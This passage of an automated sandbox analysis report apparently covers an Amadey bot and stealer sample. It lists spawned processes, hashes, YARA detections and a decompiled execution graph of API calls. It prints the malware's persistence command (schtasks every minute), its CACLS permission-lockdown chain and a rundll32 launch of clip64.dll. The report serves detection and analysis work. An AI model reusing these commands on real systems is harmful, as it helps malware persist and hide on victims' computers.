                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000E.00000000.319942123.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe, Author: Joe Security
                                                                      Antivirus matches:
                                                                      • Detection: 100%, Joe Sandbox ML
                                                                      • Detection: 81%, ReversingLabs
                                                                      Reputation:moderate

                                                                      Target ID:15
                                                                      Start time:23:06:57
                                                                      Start date:07/02/2023
                                                                      Path:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user~1\AppData\Local\Temp\4b9a106e76\mnolyk.exe"
                                                                      Imagebase:0x1b0000
                                                                      File size:241664 bytes
                                                                      MD5 hash:8BB923C4D81284DAEF7896E5682DF6C6
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000F.00000002.776200491.00000000001B1000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000F.00000000.321018621.00000000001B1000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 0000000F.00000002.776777410.0000000000F78000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 0000000F.00000002.776777410.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe, Author: Joe Security
                                                                      Antivirus matches:
                                                                      • Detection: 100%, Joe Sandbox ML
                                                                      • Detection: 81%, ReversingLabs
                                                                      Reputation:moderate

                                                                      Target ID:16
                                                                      Start time:23:06:58
                                                                      Start date:07/02/2023
                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\user~1\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /F
                                                                      Imagebase:0x180000
                                                                      File size:185856 bytes
                                                                      MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      Target ID:17
                                                                      Start time:23:06:58
                                                                      Start date:07/02/2023
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff6edaf0000
                                                                      File size:625664 bytes
                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language

                                                                      Target ID:18
                                                                      Start time:23:06:58
                                                                      Start date:07/02/2023
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "mnolyk.exe" /P "user:N"&&CACLS "mnolyk.exe" /P "user:R" /E&&echo Y|CACLS "..\4b9a106e76" /P "user:N"&&CACLS "..\4b9a106e76" /P "user:R" /E&&Exit
                                                                      Imagebase:0xa60000
                                                                      File size:232960 bytes
                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language

                                                                      Target ID:19
                                                                      Start time:23:06:58
                                                                      Start date:07/02/2023
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff6edaf0000
                                                                      File size:625664 bytes
                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language

                                                                      Target ID:20
                                                                      Start time:23:06:58
                                                                      Start date:07/02/2023
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                      Imagebase:0xa60000
                                                                      File size:232960 bytes
                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language

                                                                      Target ID:21
                                                                      Start time:23:06:58
                                                                      Start date:07/02/2023
                                                                      Path:C:\Windows\SysWOW64\cacls.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:CACLS "mnolyk.exe" /P "user:N"
                                                                      Imagebase:0xd20000
                                                                      File size:27648 bytes
                                                                      MD5 hash:4CBB1C027DF71C53A8EE4C855FD35B25
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language

                                                                      Target ID:22
                                                                      Start time:23:06:59
                                                                      Start date:07/02/2023
                                                                      Path:C:\Windows\SysWOW64\cacls.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:CACLS "mnolyk.exe" /P "user:R" /E
                                                                      Imagebase:0xd20000
                                                                      File size:27648 bytes
                                                                      MD5 hash:4CBB1C027DF71C53A8EE4C855FD35B25
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language

                                                                      Target ID:23
                                                                      Start time:23:06:59
                                                                      Start date:07/02/2023
                                                                      Path:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user~1\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Imagebase:0x1b0000
                                                                      File size:241664 bytes
                                                                      MD5 hash:8BB923C4D81284DAEF7896E5682DF6C6
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000017.00000000.324372963.00000000001B1000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000017.00000002.331572351.00000000001B1000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security

                                                                      Target ID:24
                                                                      Start time:23:06:59
                                                                      Start date:07/02/2023
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                      Imagebase:0xa60000
                                                                      File size:232960 bytes
                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language

                                                                      Target ID:25
                                                                      Start time:23:07:00
                                                                      Start date:07/02/2023
                                                                      Path:C:\Windows\SysWOW64\cacls.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:CACLS "..\4b9a106e76" /P "user:N"
                                                                      Imagebase:0xd20000
                                                                      File size:27648 bytes
                                                                      MD5 hash:4CBB1C027DF71C53A8EE4C855FD35B25
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language

                                                                      Target ID:26
                                                                      Start time:23:07:02
                                                                      Start date:07/02/2023
                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main
                                                                      Imagebase:0x360000
                                                                      File size:61952 bytes
                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language

                                                                      Target ID:27
                                                                      Start time:23:07:02
                                                                      Start date:07/02/2023
                                                                      Path:C:\Windows\SysWOW64\cacls.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:CACLS "..\4b9a106e76" /P "user:R" /E
                                                                      Imagebase:0xd20000
                                                                      File size:27648 bytes
                                                                      MD5 hash:4CBB1C027DF71C53A8EE4C855FD35B25
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language

                                                                      Target ID:30
                                                                      Start time:23:08:00
                                                                      Start date:07/02/2023
                                                                      Path:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user~1\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Imagebase:0x1b0000
                                                                      File size:241664 bytes
                                                                      MD5 hash:8BB923C4D81284DAEF7896E5682DF6C6
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001E.00000002.455495920.00000000001B1000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001E.00000000.454883478.00000000001B1000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security

                                                                      Target ID:32
                                                                      Start time:23:09:00
                                                                      Start date:07/02/2023
                                                                      Path:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user~1\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Imagebase:0x1b0000
                                                                      File size:241664 bytes
                                                                      MD5 hash:8BB923C4D81284DAEF7896E5682DF6C6
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000020.00000000.583498615.00000000001B1000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000020.00000002.583819503.00000000001B1000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security

                                                                      Target ID:33
                                                                      Start time:23:10:00
                                                                      Start date:07/02/2023
                                                                      Path:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user~1\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Imagebase:0x1b0000
                                                                      File size:241664 bytes
                                                                      MD5 hash:8BB923C4D81284DAEF7896E5682DF6C6
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000021.00000002.712917292.00000000001B1000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000021.00000000.712317333.00000000001B1000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security

                                                                      Reset < >

                                                                        Execution Graph

                                                                        Execution Coverage:26.9%
                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                        Signature Coverage:29.5%
                                                                        Total number of Nodes:969
                                                                        Total number of Limit Nodes:43
                                                                        execution_graph 3128 3d7270 _except_handler4_common 3129 3d69b0 3130 3d69b5 3129->3130 3138 3d6fbe GetModuleHandleW 3130->3138 3132 3d69c1 __set_app_type __p__fmode __p__commode 3133 3d69f9 3132->3133 3134 3d6a0e 3133->3134 3135 3d6a02 __setusermatherr 3133->3135 3140 3d71ef _controlfp 3134->3140 3135->3134 3137 3d6a13 3139 3d6fcf 3138->3139 3139->3132 3140->3137 3141 3d34f0 3142 3d3504 3141->3142 3143 3d35b8 3141->3143 3142->3143 3145 3d35be GetDesktopWindow 3142->3145 3146 3d351b 3142->3146 3144 3d3526 3143->3144 3147 3d3671 EndDialog 3143->3147 3163 3d43d0 6 API calls 3145->3163 3149 3d354f 3146->3149 3150 3d351f 3146->3150 3147->3144 3149->3144 3153 3d3559 ResetEvent 3149->3153 3150->3144 3152 3d352d TerminateThread EndDialog 3150->3152 3152->3144 3154 3d44b9 20 API calls 3153->3154 3157 3d3581 3154->3157 3155 3d361d SetWindowTextA CreateThread 3155->3144 3158 3d3646 3155->3158 3156 3d35e0 GetDlgItem SendMessageA GetDlgItem SendMessageA 3156->3155 3159 3d359b SetEvent 3157->3159 3161 3d358a SetEvent 3157->3161 3160 3d44b9 20 API calls 3158->3160 3162 3d3680 4 API calls 3159->3162 3160->3143 3161->3144 3162->3143 3164 3d4463 SetWindowPos 3163->3164 3166 3d6ce0 4 API calls 3164->3166 3167 3d35d6 3166->3167 3167->3155 3167->3156 3168 3d6ef0 3169 3d6f2d 3168->3169 3171 3d6f02 3168->3171 3170 3d6f27 ?terminate@ 3170->3169 3171->3169 3171->3170 3172 3d6bef _XcptFilter 2196 3d4ca0 GlobalAlloc 2197 3d6a60 2214 3d7155 2197->2214 2199 3d6a65 2200 3d6a76 GetStartupInfoW 2199->2200 2201 3d6a93 2200->2201 2202 3d6aa8 2201->2202 2203 3d6aaf Sleep 2201->2203 2204 3d6ac7 _amsg_exit 2202->2204 2206 3d6ad1 2202->2206 2203->2201 2204->2206 2205 3d6b13 _initterm 2210 3d6b2e __IsNonwritableInCurrentImage 2205->2210 2206->2205 2207 3d6af4 2206->2207 2206->2210 2208 3d6bd6 _ismbblead 2208->2210 2209 3d6c1e 2209->2207 2212 3d6c27 _cexit 2209->2212 2210->2208 2210->2209 2213 3d6bbe exit 2210->2213 2219 3d2bfb GetVersion 2210->2219 2212->2207 2213->2210 2215 3d717e GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 2214->2215 2216 3d717a 2214->2216 2218 3d71cd 2215->2218 2216->2215 2217 3d71e2 2216->2217 2217->2199 2218->2217 2220 3d2c0f 2219->2220 2221 3d2c50 2219->2221 2220->2221 2223 3d2c13 GetModuleHandleW 2220->2223 2236 3d2caa memset memset memset 2221->2236 2223->2221 2224 3d2c22 GetProcAddress 2223->2224 2224->2221 2232 3d2c34 2224->2232 2226 3d2c8e 2227 3d2c9e 2226->2227 2228 3d2c97 CloseHandle 2226->2228 2227->2210 2228->2227 2232->2221 2234 3d2c89 2331 3d1f90 2234->2331 2348 3d468f FindResourceA SizeofResource 2236->2348 2239 3d2e30 2242 3d44b9 20 API calls 2239->2242 2240 3d2d2d CreateEventA SetEvent 2241 3d468f 7 API calls 2240->2241 2243 3d2d57 2241->2243 2244 3d2f06 2242->2244 2245 3d2d7d 2243->2245 2246 3d2d5b 2243->2246 2353 3d6ce0 2244->2353 2248 3d2e1f 2245->2248 2251 3d468f 7 API calls 2245->2251 2358 3d44b9 2246->2358 2387 3d5c9e 2248->2387 2254 3d2d9f 2251->2254 2252 3d2c62 2252->2226 2277 3d2f1d 2252->2277 2254->2246 2256 3d2da3 CreateMutexA 2254->2256 2255 3d2e3a 2257 3d2e43 2255->2257 2258 3d2e52 FindResourceA 2255->2258 2256->2248 2259 3d2dbd GetLastError 2256->2259 2413 3d2390 2257->2413 2261 3d2e6e 2258->2261 2262 3d2e64 LoadResource 2258->2262 2259->2248 2260 3d2dca 2259->2260 2264 3d2dea 2260->2264 2265 3d2dd5 2260->2265 2268 3d2d6e 2261->2268 2428 3d36ee GetVersionExA 2261->2428 2262->2261 2267 3d44b9 20 API calls 2264->2267 2266 3d44b9 20 API calls 2265->2266 2269 3d2de8 2266->2269 2270 3d2dff 2267->2270 2268->2244 2272 3d2e04 CloseHandle 2269->2272 2270->2248 2270->2272 2272->2244 2278 3d2f6c 2277->2278 2279 3d2f3f 2277->2279 2572 3d5164 2278->2572 2280 3d2f5f 2279->2280 2552 3d51e5 2279->2552 2705 3d3a3f 2280->2705 2284 3d2f71 2287 3d3041 2284->2287 2587 3d55a0 2284->2587 2290 3d6ce0 4 API calls 2287->2290 2292 3d2c6b 2290->2292 2291 3d2f86 GetSystemDirectoryA 2293 3d658a CharPrevA 2291->2293 2318 3d52b6 2292->2318 2294 3d2fab LoadLibraryA 2293->2294 2295 3d2ff7 FreeLibrary 2294->2295 2296 3d2fc0 GetProcAddress 2294->2296 2298 3d3017 SetCurrentDirectoryA 2295->2298 2299 3d3006 2295->2299 2296->2295 2297 3d2fd6 DecryptFileA 2296->2297 2297->2295 2307 3d2ff0 2297->2307 2300 3d3054 2298->2300 2301 3d3026 2298->2301 2299->2298 2637 3d621e GetWindowsDirectoryA 2299->2637 2304 3d3061 2300->2304 2648 3d3b26 2300->2648 2302 3d44b9 20 API calls 2301->2302 2306 3d3037 2302->2306 2304->2287 2309 3d307a 2304->2309 2657 3d256d 2304->2657 2724 3d6285 GetLastError 2306->2724 2307->2295 2314 3d3098 2309->2314 2668 3d3ba2 2309->2668 2314->2287 2316 3d30af 2314->2316 2726 3d4169 2316->2726 2319 3d52d6 2318->2319 2324 3d5316 2318->2324 2321 3d5300 LocalFree LocalFree 2319->2321 2323 3d52eb SetFileAttributesA DeleteFileA 2319->2323 2320 3d538c 2322 3d6ce0 4 API calls 2320->2322 2321->2319 2321->2324 2325 3d2c72 2322->2325 2323->2321 2327 3d535e SetCurrentDirectoryA 2324->2327 2328 3d65e8 4 API calls 2324->2328 2330 3d5374 2324->2330 2325->2226 2325->2234 2329 3d2390 13 API calls 2327->2329 2328->2327 2329->2330 2330->2320 3059 3d1fe1 2330->3059 2332 3d1f9a 2331->2332 2333 3d1f9f 2331->2333 2334 3d1ea7 15 API calls 2332->2334 2335 3d1fc0 2333->2335 2338 3d44b9 20 API calls 2333->2338 2339 3d1fd9 2333->2339 2334->2333 2336 3d1fcf ExitWindowsEx 2335->2336 2337 3d1ee2 GetCurrentProcess OpenProcessToken 2335->2337 2335->2339 2336->2339 2341 3d1f23 LookupPrivilegeValueA AdjustTokenPrivileges CloseHandle 2337->2341 2343 3d1f0e 2337->2343 2338->2335 2339->2226 2342 3d1f6b ExitWindowsEx 2341->2342 2341->2343 2342->2343 2344 3d1f1f 2342->2344 2345 3d44b9 20 API calls 2343->2345 2346 3d6ce0 4 API calls 2344->2346 2345->2344 2347 3d1f8c 2346->2347 2347->2226 2349 3d46b6 2348->2349 2351 3d2d1a 2348->2351 2350 3d46be FindResourceA LoadResource LockResource 2349->2350 2349->2351 2350->2351 2352 3d46df memcpy_s FreeResource 2350->2352 2351->2239 2351->2240 2352->2351 2354 3d6ce8 2353->2354 2355 3d6ceb 2353->2355 2354->2252 2470 3d6cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2355->2470 2357 3d6e26 2357->2252 2359 3d44fe LoadStringA 2358->2359 2360 3d455a 2358->2360 2361 3d4527 2359->2361 2362 3d4562 2359->2362 2364 3d6ce0 4 API calls 2360->2364 2471 3d681f 2361->2471 2368 3d45c9 2362->2368 2374 3d457e 2362->2374 2366 3d4689 2364->2366 2366->2268 2367 3d4536 MessageBoxA 2367->2360 2370 3d45cd LocalAlloc 2368->2370 2371 3d4607 LocalAlloc 2368->2371 2370->2360 2375 3d45f3 2370->2375 2371->2360 2382 3d45c4 2371->2382 2374->2374 2377 3d4596 LocalAlloc 2374->2377 2379 3d171e _vsnprintf 2375->2379 2376 3d462d MessageBeep 2380 3d681f 10 API calls 2376->2380 2377->2360 2378 3d45af 2377->2378 2488 3d171e 2378->2488 2379->2382 2383 3d463b 2380->2383 2382->2376 2384 3d4645 MessageBoxA LocalFree 2383->2384 2385 3d67c9 EnumResourceLanguagesA 2383->2385 2384->2360 2385->2384 2392 3d5e17 2387->2392 2397 3d5cc3 2387->2397 2388 3d6ce0 4 API calls 2389 3d2e2c 2388->2389 2389->2239 2389->2255 2390 3d5ced CharNextA 2390->2397 2391 3d5dec GetModuleFileNameA 2391->2392 2393 3d5e0a 2391->2393 2392->2388 2498 3d66c8 2393->2498 2395 3d6218 2507 3d6e2a 2395->2507 2397->2390 2397->2392 2397->2395 2399 3d5e36 CharUpperA 2397->2399 2405 3d5dd0 2397->2405 2406 3d5f9f CharUpperA 2397->2406 2407 3d5f59 CompareStringA 2397->2407 2408 3d6003 CharUpperA 2397->2408 2409 3d5edc CharUpperA 2397->2409 2410 3d60a2 CharUpperA 2397->2410 2412 3d667f IsDBCSLeadByte CharNextA 2397->2412 2503 3d658a 2397->2503 2399->2397 2400 3d61d0 2399->2400 2401 3d44b9 20 API calls 2400->2401 2402 3d61e7 2401->2402 2403 3d61f7 ExitProcess 2402->2403 2404 3d61f0 CloseHandle 2402->2404 2404->2403 2405->2391 2405->2392 2406->2397 2407->2397 2408->2397 2409->2397 2410->2397 2412->2397 2414 3d24cb 2413->2414 2417 3d23b9 2413->2417 2415 3d6ce0 4 API calls 2414->2415 2416 3d24dc 2415->2416 2416->2268 2417->2414 2418 3d23e9 FindFirstFileA 2417->2418 2418->2414 2426 3d2407 2418->2426 2419 3d2479 2423 3d2488 SetFileAttributesA DeleteFileA 2419->2423 2420 3d2421 lstrcmpA 2421 3d24a9 FindNextFileA 2420->2421 2422 3d2431 lstrcmpA 2420->2422 2424 3d24bd FindClose RemoveDirectoryA 2421->2424 2421->2426 2422->2421 2422->2426 2423->2421 2424->2414 2425 3d658a CharPrevA 2425->2426 2426->2419 2426->2420 2426->2421 2426->2425 2427 3d2390 5 API calls 2426->2427 2427->2426 2433 3d3737 2428->2433 2435 3d372d 2428->2435 2429 3d44b9 20 API calls 2430 3d39fc 2429->2430 2431 3d6ce0 4 API calls 2430->2431 2432 3d2e92 2431->2432 2432->2244 2432->2268 2443 3d18a3 2432->2443 2433->2430 2433->2435 2436 3d38a4 2433->2436 2514 3d28e8 2433->2514 2435->2429 2435->2430 2436->2430 2436->2435 2437 3d39c1 MessageBeep 2436->2437 2438 3d681f 10 API calls 2437->2438 2439 3d39ce 2438->2439 2440 3d39d8 MessageBoxA 2439->2440 2441 3d67c9 EnumResourceLanguagesA 2439->2441 2440->2430 2441->2440 2444 3d19b8 2443->2444 2445 3d18d5 2443->2445 2447 3d6ce0 4 API calls 2444->2447 2543 3d17ee LoadLibraryA 2445->2543 2449 3d19d5 2447->2449 2449->2268 2463 3d6517 FindResourceA 2449->2463 2450 3d18e5 GetCurrentProcess OpenProcessToken 2450->2444 2451 3d1900 GetTokenInformation 2450->2451 2452 3d1918 GetLastError 2451->2452 2453 3d19aa CloseHandle 2451->2453 2452->2453 2454 3d1927 LocalAlloc 2452->2454 2453->2444 2455 3d19a9 2454->2455 2456 3d1938 GetTokenInformation 2454->2456 2455->2453 2457 3d194e AllocateAndInitializeSid 2456->2457 2458 3d19a2 LocalFree 2456->2458 2457->2458 2462 3d196e 2457->2462 2458->2455 2459 3d1999 FreeSid 2459->2458 2460 3d1975 EqualSid 2461 3d198c 2460->2461 2460->2462 2461->2459 2462->2459 2462->2460 2462->2461 2464 3d656b 2463->2464 2465 3d6536 LoadResource 2463->2465 2467 3d44b9 20 API calls 2464->2467 2465->2464 2466 3d6544 DialogBoxIndirectParamA FreeResource 2465->2466 2466->2464 2468 3d657c 2466->2468 2467->2468 2468->2268 2470->2357 2472 3d6857 GetVersionExA 2471->2472 2481 3d691a 2471->2481 2474 3d687c 2472->2474 2472->2481 2473 3d6ce0 4 API calls 2475 3d452c 2473->2475 2476 3d68a5 GetSystemMetrics 2474->2476 2474->2481 2475->2367 2482 3d67c9 2475->2482 2477 3d68b5 RegOpenKeyExA 2476->2477 2476->2481 2478 3d68d6 RegQueryValueExA RegCloseKey 2477->2478 2477->2481 2479 3d690c 2478->2479 2478->2481 2492 3d66f9 2479->2492 2481->2473 2483 3d67e2 2482->2483 2487 3d6803 2482->2487 2496 3d6793 EnumResourceLanguagesA 2483->2496 2485 3d67f5 2485->2487 2497 3d6793 EnumResourceLanguagesA 2485->2497 2487->2367 2489 3d172d 2488->2489 2490 3d173d _vsnprintf 2489->2490 2491 3d175d 2489->2491 2490->2491 2491->2382 2493 3d670f 2492->2493 2494 3d6740 CharNextA 2493->2494 2495 3d674b 2493->2495 2494->2493 2495->2481 2496->2485 2497->2487 2499 3d66d5 2498->2499 2500 3d66f3 2499->2500 2502 3d66e5 CharNextA 2499->2502 2510 3d6648 2499->2510 2500->2392 2502->2499 2504 3d659b 2503->2504 2504->2504 2505 3d65b8 CharPrevA 2504->2505 2506 3d65ab 2504->2506 2505->2506 2506->2397 2513 3d6cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2507->2513 2509 3d621d 2511 3d665d IsDBCSLeadByte 2510->2511 2512 3d6668 2510->2512 2511->2512 2512->2499 2513->2509 2515 3d2a62 2514->2515 2522 3d290d 2514->2522 2516 3d2a6e GlobalFree 2515->2516 2517 3d2a75 2515->2517 2516->2517 2517->2436 2519 3d2955 GlobalAlloc 2519->2515 2520 3d2968 GlobalLock 2519->2520 2520->2515 2520->2522 2521 3d2a20 GlobalUnlock 2521->2522 2522->2515 2522->2519 2522->2521 2523 3d2a80 GlobalUnlock 2522->2523 2524 3d2773 2522->2524 2523->2515 2525 3d27a3 CharUpperA CharNextA CharNextA 2524->2525 2526 3d28b2 2524->2526 2527 3d27db 2525->2527 2528 3d28b7 GetSystemDirectoryA 2525->2528 2526->2528 2529 3d28a8 GetWindowsDirectoryA 2527->2529 2530 3d27e3 2527->2530 2531 3d28bf 2528->2531 2529->2531 2535 3d658a CharPrevA 2530->2535 2532 3d28d2 2531->2532 2533 3d658a CharPrevA 2531->2533 2534 3d6ce0 4 API calls 2532->2534 2533->2532 2536 3d28e2 2534->2536 2537 3d2810 RegOpenKeyExA 2535->2537 2536->2522 2537->2531 2538 3d2837 RegQueryValueExA 2537->2538 2539 3d285c 2538->2539 2540 3d289a RegCloseKey 2538->2540 2541 3d2867 ExpandEnvironmentStringsA 2539->2541 2542 3d287a 2539->2542 2540->2531 2541->2542 2542->2540 2544 3d1826 GetProcAddress 2543->2544 2545 3d1890 2543->2545 2547 3d1889 FreeLibrary 2544->2547 2548 3d1839 AllocateAndInitializeSid 2544->2548 2546 3d6ce0 4 API calls 2545->2546 2549 3d189f 2546->2549 2547->2545 2548->2547 2550 3d185f FreeSid 2548->2550 2549->2444 2549->2450 2550->2547 2553 3d468f 7 API calls 2552->2553 2554 3d51f9 LocalAlloc 2553->2554 2555 3d522d 2554->2555 2556 3d520d 2554->2556 2558 3d468f 7 API calls 2555->2558 2557 3d44b9 20 API calls 2556->2557 2559 3d521e 2557->2559 2560 3d523a 2558->2560 2561 3d6285 GetLastError 2559->2561 2562 3d523e 2560->2562 2563 3d5262 lstrcmpA 2560->2563 2571 3d5223 2561->2571 2564 3d44b9 20 API calls 2562->2564 2565 3d527e 2563->2565 2566 3d5272 LocalFree 2563->2566 2568 3d524f LocalFree 2564->2568 2567 3d44b9 20 API calls 2565->2567 2569 3d2f4d 2566->2569 2570 3d5290 LocalFree 2567->2570 2568->2569 2569->2278 2569->2280 2569->2287 2570->2571 2571->2569 2573 3d468f 7 API calls 2572->2573 2574 3d5175 2573->2574 2575 3d517a 2574->2575 2576 3d51af 2574->2576 2578 3d44b9 20 API calls 2575->2578 2577 3d468f 7 API calls 2576->2577 2579 3d51c0 2577->2579 2586 3d518d 2578->2586 2739 3d6298 2579->2739 2583 3d51ce 2585 3d44b9 20 API calls 2583->2585 2584 3d51e1 2584->2284 2585->2586 2586->2284 2588 3d468f 7 API calls 2587->2588 2589 3d55c7 LocalAlloc 2588->2589 2590 3d55fd 2589->2590 2591 3d55db 2589->2591 2592 3d468f 7 API calls 2590->2592 2593 3d44b9 20 API calls 2591->2593 2594 3d560a 2592->2594 2595 3d55ec 2593->2595 2596 3d560e 2594->2596 2597 3d5632 lstrcmpA 2594->2597 2598 3d6285 GetLastError 2595->2598 2599 3d44b9 20 API calls 2596->2599 2600 3d564b LocalFree 2597->2600 2601 3d5645 2597->2601 2620 3d55f1 2598->2620 2602 3d561f LocalFree 2599->2602 2603 3d565b 2600->2603 2604 3d5696 2600->2604 2601->2600 2625 3d55f6 2602->2625 2612 3d5467 49 API calls 2603->2612 2605 3d589f 2604->2605 2607 3d56ae GetTempPathA 2604->2607 2608 3d6517 24 API calls 2605->2608 2606 3d6ce0 4 API calls 2609 3d2f7e 2606->2609 2610 3d56eb 2607->2610 2611 3d56c3 2607->2611 2608->2625 2609->2287 2609->2291 2618 3d586c GetWindowsDirectoryA 2610->2618 2619 3d5717 GetDriveTypeA 2610->2619 2610->2625 2751 3d5467 2611->2751 2614 3d5678 2612->2614 2616 